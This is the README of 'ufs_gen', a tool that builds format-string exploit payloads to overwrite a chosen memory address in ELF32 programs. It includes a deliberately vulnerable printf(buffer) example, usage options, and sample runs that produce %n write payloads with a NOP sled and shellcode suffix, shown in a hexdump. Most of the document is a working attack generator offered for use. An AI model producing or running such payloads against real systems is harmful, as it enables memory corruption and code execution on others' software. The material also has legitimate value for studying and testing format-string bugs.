blob: d8d33589937a32eb299e75691d48f0f0d33eb2bd (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
|
ufs_gen
=======
This software allows you to generate a payload which may override an address
with the value of your choice.
The syntax is quite simple:
There are three parameters needed for the program to run correctly.
stackidx: this parameter specifies how many dwords you need to access the
beginning of your buffer (or payload).
override: the address to override
with: the value to inject at the address overriden
This software is intended to work with an ELF32 generated by a typical code.
example:
int function(const char *payload)
{
char buffer[BUFSIZ];
strncpy(buffer, payload, sizeof(buffer));
buffer[sizeof(buffer) - 1] = '\0';
printf(buffer);
return 0;
}
The support of ELF64 and other formats is intended but not written yet.
Although the option 'addrsize' might already be used to specify if an address
is not 4 bytes long, there is very few chances that it would work correctly.
The support of printf(payload) directly (i.e. without a temporary buffer) is
also planned.
We support the option --prefix and --suffix which respectively prepend and
append their argument to the payload.
We also support the option --sfxnops which adds n NOP byte (0x90) between the
payload and the suffix
Example
=======
user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4
D3"E3"F3"G3"%120x%4$n%239x%5$n%239x%6$n%239x%7$n
user@localhost$ shellcode="$(perl -e 'print "\x68\x2f\x73\x68\xff\xfe\x44"')"
user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4 --suffix "$shellcode" --sfxnops 100 | hexdump -C
NOP bytes are at offset 52 (0x34)
suffix is at offset 152 (0x98)
00000000 44 33 22 11 45 33 22 11 46 33 22 11 47 33 22 11 |D3".E3".F3".G3".|
00000010 25 31 32 30 78 25 34 24 6e 25 32 33 39 78 25 35 |%120x%4$n%239x%5|
00000020 24 6e 25 32 33 39 78 25 36 24 6e 25 32 33 39 78 |$n%239x%6$n%239x|
00000030 25 37 24 6e 90 90 90 90 90 90 90 90 90 90 90 90 |%7$n............|
00000040 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
00000090 90 90 90 90 90 90 90 90 68 2f 73 68 ff fe 44 |........h/sh..D|
0000009f
License
=======
This software is free software covered by the GPL license v2. You should
read the COPYING file to understand what is implied.
|